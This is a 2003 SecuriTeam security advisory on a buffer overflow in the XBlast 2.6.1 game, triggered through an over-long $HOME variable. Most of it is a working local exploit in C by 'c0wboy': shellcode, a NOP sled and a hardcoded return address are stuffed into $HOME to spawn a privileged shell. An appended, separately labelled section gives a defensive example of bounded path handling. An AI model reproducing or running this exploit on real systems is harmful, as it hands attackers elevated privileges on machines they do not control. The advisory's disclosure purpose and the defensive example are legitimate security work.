[EXPL] XBlast Local Root Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 07/28/03
To: list@securiteam.com Date: 28 Jul 2003 14:55:08 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
XBlast Local Root Exploit
------------------------------------------------------------------------
SUMMARY
"XBlast <http://www.xblast-center.com/> is a multi-player arcade game for
X11R5/R6. The game can be played with at least two players and up to four
players. It was inspired by the video/computer game
Bomberman (Dynablaster), which was to my knowledge first programmed for
NEC's PC Engine/Turbo Grafx. Other (commercial) versions of the original
game exist for IBM-PC, Atari ST, Amiga, NES, GameBoy, and Super NES."
A buffer inside XBlast can be overflowed by passing a long $HOME
environment variable; the overflow allows execution of arbitrary code.
DETAILS
Vulnerable Systems:
* XBlast version 2.6.1
/* 0x333xblast => xblast 2.6.1 local exploit
*
* xblast could be overflowed by passing a long $HOME
* env. For more info read advisory @ :
*
* http://www.0x333.org/advisories/outsider-003.txt
*
* * note * :
* exploit tested against xblast-2.6.beta-1.i386.rpm
* under Red Hat Linux 9.0. xblast is not installed
* +s by default.
*
* coded by c0wboy
*
* (c) 0x333 Outsider Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define BIN "/usr/X11R6/bin/xblast"
#define SIZE 1032
#define RET 0xbffffb38
#define NOP 0x90
unsigned char shellcode[] =
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
void banner (void);
void memret (char *, int, int, int);

void banner (void)
{
    fprintf (stdout, "\n\n --- xblast local exploit by c0wboy ---\n");
    fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n");
    fprintf (stdout, " [NOW PRESS 'y' TO SPAWN THE SHELL]\n\n");
}

void memret (char *buffer, int ret, int size, int align)
{
    int i;
    int * ptr = (int *) (buffer + align);
    for (i=0; i<size; i+=4)
        *ptr++ = ret;
    ptr = 0x0;
}

int main ()
{
    int ret = RET;
    char out[SIZE];
    memret ((char *)out, ret, SIZE-1, 0);
    memset ((char *)out, NOP, 333);
    memcpy ((char *)out+333, shellcode, strlen(shellcode));
    setenv ("HOME", out, 1);
    banner ();
    execl (BIN, BIN, 0x0);
}
ADDITIONAL INFORMATION
The information was provided by c0wboy <mailto:c0wboy@tiscali.it>.
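
The defensive counterpart to the $HOME overflow described above, as an added example that is not XBlast's code and not part of the original bulletin: a bounded path builder that treats an over-long or non-absolute $HOME as an error instead of copying it into a fixed buffer. The names build_home_path, try_home_of_length, PATH_BUF (1024 is an assumed size) and the ".example" leaf name are hypothetical, and the HOME values are constructed test input.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L  /* for setenv() */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1024  /* assumed size; the advisory does not give XBlast's buffer size */

/* Hypothetical helper (not XBlast code): write "<$HOME>/<leaf>" into dst.
 * Returns 0 on success, -1 if HOME is unset, not absolute, or too long.
 * Truncation is an error, so dst never holds a silently shortened path. */
int build_home_path(char *dst, size_t dstlen, const char *leaf)
{
    const char *home = getenv("HOME");
    int n;
    if (dst == NULL || dstlen == 0 || leaf == NULL) return -1;
    dst[0] = '\0';
    if (home == NULL || home[0] != '/')
        return -1;
    n = snprintf(dst, dstlen, "%s/%s", home, leaf);  /* bounded, unlike strcpy/sprintf */
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Demo driver: set HOME to a constructed value of n bytes ('/' then 'A's)
 * and return what build_home_path() reports; -2 means the demo setup failed. */
int try_home_of_length(size_t n)
{
    char path[PATH_BUF];
    char *home = (n > 0) ? malloc(n + 1) : NULL;
    if (home == NULL) return -2;
    memset(home, 'A', n);
    home[0] = '/'; home[n] = '\0';
    if (setenv("HOME", home, 1) != 0) { free(home); return -2; }
    free(home);  /* setenv() copies the string */
    return build_home_path(path, sizeof path, ".example");
}

int main(void)
{
    size_t lens[] = { 12, 1014, 1015, 1032 }, i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("HOME of %zu bytes -> %d\n", lens[i], try_home_of_length(lens[i]));
    return 0;
}
```

With the assumed 1024-byte buffer, a 1014-byte HOME is the longest value that still fits once "/.example" and the terminating NUL are added; anything longer is rejected rather than truncated.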